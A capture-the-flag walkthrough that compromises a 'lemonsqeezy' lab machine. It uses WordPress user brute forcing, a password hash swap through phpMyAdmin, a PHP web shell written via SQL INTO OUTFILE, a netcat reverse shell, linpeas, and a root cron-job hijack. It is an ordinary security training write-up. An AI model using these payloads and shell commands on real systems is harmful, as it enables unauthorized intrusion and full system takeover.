nmap -sC -sV 192.168.1.133
-sC for default scripts,-sV for version enumeration and -p- to scan all ports.

Looking at the result we can see only one service (http) running on porn 80.

Visiting the ip, we can see apache2 default page.

After running gobuster we can see, some directory. Among the result we wordpress and phpmyadmin is the most interesting ones.

In /phpmyadmin I tried to enter default credentials, which didn’t worked.

Under /wordpress we can see wordpress sire with default theme and nothing much.

Before moving on, make sure to add lemonsqeezy to /etc/hosts
sudo nano /etc/hosts and add ip of the machine with name lemonsqeezy

Then I again ran gobuster under /wordpress directory with an aim of finding anything to workon. There was nothing much of use.

Since wordpress is running, lets use wpscan tool to enumerate users

After running wpscan we can see two users; lemon and orange

lets bruteforce password for this user.

In the command
— usernames flag is used to specify usernames
— passwords flag is used to specify password list, in this case i am using rockyou.txt

And we got password for user orange, but for user lemon we were unable to bruteforce password.

orange:ginger
lemon:??

Lets login with the found credentials. visit /wordpress/wp-admin

We are successfully logged in as user orange. When opening post section we can see there is draft post with name Keepthis safe!

On opening draft post we get n0t1n@w0rdl1st! which looks like password for some thing.

First I tried to use this password for user lemon on wordpress, but failed.
Then I remembered /phpmyadmin

Under /phpmyadmin I tried to login with this password and username set to orange and it worked.

orange:n0t1n@w0rdl1st!

In this phpadmin page, first thing I checked was wordpress database

Under wp_users table, we can see hashed password of user lemon

lemon:$P$ByDvlux0J/6CvT2nU20bxqp/5mDxc00

I tried to crack this hash, but I was unable to crack.
So next best idea would be to change this hash to our own hash.

Visit: https://wprefers.com/wordpress-password-hash-generator/

In the given website I entered password newpass1 and generated a wordpress password hash.

newpass1 → $P$BMjMI8GHLJ0mtRzXyS1rv6sY5U2YDO/

Then replace this newly generated hash in lemon’s password section

And now when I tried to login as user lemon:newpass1 it worked.
Now we have much more access in wordpress than user orange.
From here my next step would be to paste php reverse shell code and make it execute and get reverse shell.

Which didn’t worked as user didn’t have such power.

So I planned to user SQL query to execute malicious code.

Visit phpmyadmin page, Under sql section paste this malicious code.
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/wordpress/revshell.php”

<?php system($_GET['cmd']); ?>: This is the actual PHP code that will be executed. It uses the system function to run a command specified in the 'cmd' parameter of the GET request.

into outfile "/var/www/html/wordpress/revshell.php": This part of the code indicates the file path where the PHP code will be written.

Then run the query.

If we visit /wordpress/revshell.php?cmd=whoami
we can see, we are able to execute commands.

With this power, we will execute reverse shell command to get ourself shell access.

I will be using cheasheet form pentestmonkey

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

I will be using Netcat code

nc -e /bin/sh 192.168.1.128 1234

Make sure to change the ip to your machine’s

url-encode this code using https://www.urlencoder.org/

Make netcat listner ready, remember to use same port used in netcat code from pentestmonkey cheatsheet.

Now paste the urlencoded string.

Looking at the netcat listener, we should have shell as user www-data.
Currently this shell is not workable , so lets upgrade the shell.

First run python -c ‘import pty; pty.spawn(“/bin/bash”)’
Then background this session using ctrl Z

Then run stty raw -echo && fg and enter reset

Set terminal type xterm , terminal type may be different in you case so check before entering.

Now we have fully interactive shell.

If you are having problem upgrading the shell, watch this video

user.txt flag is located inside /var/www
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
You might think how i found the location of user.txt
You can run this command
find / -type f -name “*.txt” 2>/dev/null
which will list all the .txt file location

For escalating privelege, I will be using linpeas

go to /var/www/html/wordpress as this is only place i found we have access to download the files.

Then use command
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh which will download the script

Then to make the script executable use command chmod +x linpeas.sh

and finally run the script using ./linpeas.sh

Looking at the result, we can see interesting cronjob which runs as root.
*/2 * * * * root /etc/logrotate.d/logrotate

*/2: This indicates that the job should run every 2 minutes.

if we look at the permisssion of logrotate, everyone has read write and execute permission.

Which is jackpot.

We will change the logrotate’s content to some malicious one which will give a shell.
since logrotate runs every 2 minutes as root.

We should get root shell.

Same as before, from pentestmonkey cheatsheet.

we are changing contents of logrotate file using echo command
make sure to change the ip and port.

And make netcat listener ready

After 2 minutes

we should get shell as user root.

And we can run get the root flag
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=